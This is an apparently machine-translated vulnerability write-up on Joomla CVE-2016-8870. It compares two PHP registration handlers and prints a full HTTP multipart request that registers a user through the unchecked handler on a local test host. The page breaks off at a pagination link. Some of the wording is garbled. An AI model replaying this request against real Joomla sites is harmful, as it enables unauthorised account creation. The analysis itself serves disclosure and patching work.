joomla create ordinary user vulnerability analysis(cve-2016-8870)-vulnerability warning-the black bar safety net

2016-12-01T00:00:00
ID MYHACK58:62201681702
Type myhack58
Reporter 佚名
Modified 2016-12-01T00:00:00

Description

The experiment environment requirements

Joomla version 3. 44 to 3. 63

Vulnerability analysis

In joomla there are two user registration method:

  • In the components/com_users/controllers/registration. in php UsersControllerRegistration::register()
  • In the components/com_users/controllers/user. in php UsersControllerUser::register()

Comparison of two methods of code UsersControllerRegistration::register()

|

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

|

public function register() { // Check for request forgeries. JSession::checkToken() or jexit(JText::_('JINVALID_TOKEN'));

// If registration is disabled - Redirect to login page. if (JComponentHelper::getParams('com_users')->get('allowUserRegistration') == 0) { $this->setRedirect(JRoute::_('index. php? option=com_users&view=login', false));

return false; }

$app = JFactory::getApplication(); $model = $this->getModel('Registration', 'UsersModel');

//...some other php code }

---|---


UsersControllerUser::register()

1 2 3 4 5 6 7 8 9 10

|

public function register() { JSession::checkToken('post') or jexit(JText::_('JINVALID_TOKEN'));

// Get the application $app = JFactory::getApplication();

//...some other php code

}

---|---

By phpstorm to provide a comparison function(phpstorm function is very powerful), found that the difference as shown: ! Is in fact UsersControllerRegistration::register()more code:

1 2 3 4 5 6 7

|

// If registration is disabled - Redirect to login page. if (JComponentHelper::getParams('com_users')->get('allowUserRegistration') == 0) { $this->setRedirect(JRoute::_('index. php? option=com_users&view=login', false));

return false; }

---|---

Above this line of code is used to detect whether the can be injected, if you can register then jumps to the user registration page. But in UsersControllerUser::register()there is no associated validation. So we can use UsersControllerUser::register()to bypass validation, so that you can registered users.

Vulnerability testing

Conventional on the page registered is UsersControllerRegistration::register () it. Send registration request to:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50

|

POST /joomla/index. php/component/users/? task=registration. register HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: EN-us,EN;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/joomla/index.php/component/users/?view=registration Cookie: mycookie Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------189711617232278 Content-Length: 1072

-----------------------------189711617232278 Content-Disposition: form-data; name="jform[name]"

spoock -----------------------------189711617232278 Content-Disposition: form-data; name="jform[username]"

spoock -----------------------------189711617232278 Content-Disposition: form-data; name="jform[password1]"

123456 -----------------------------189711617232278 Content-Disposition: form-data; name="jform[password2]"

123456 -----------------------------189711617232278 Content-Disposition: form-data; name="jform[email1]"

test@163.com-----------------------------189711617232278 Content-Disposition: form-data; name="jform[email2]"

test@163.com -----------------------------189711617232278 Content-Disposition: form-data; name="option"

com_users -----------------------------189711617232278 Content-Disposition: form-data; name="task"

registration. register -----------------------------189711617232278 Content-Disposition: form-data; name="949e7f6eaab9a1b4dc1c1702ae9f3fc6"

1 -----------------------------189711617232278--

---|---

[1] [2] [3] next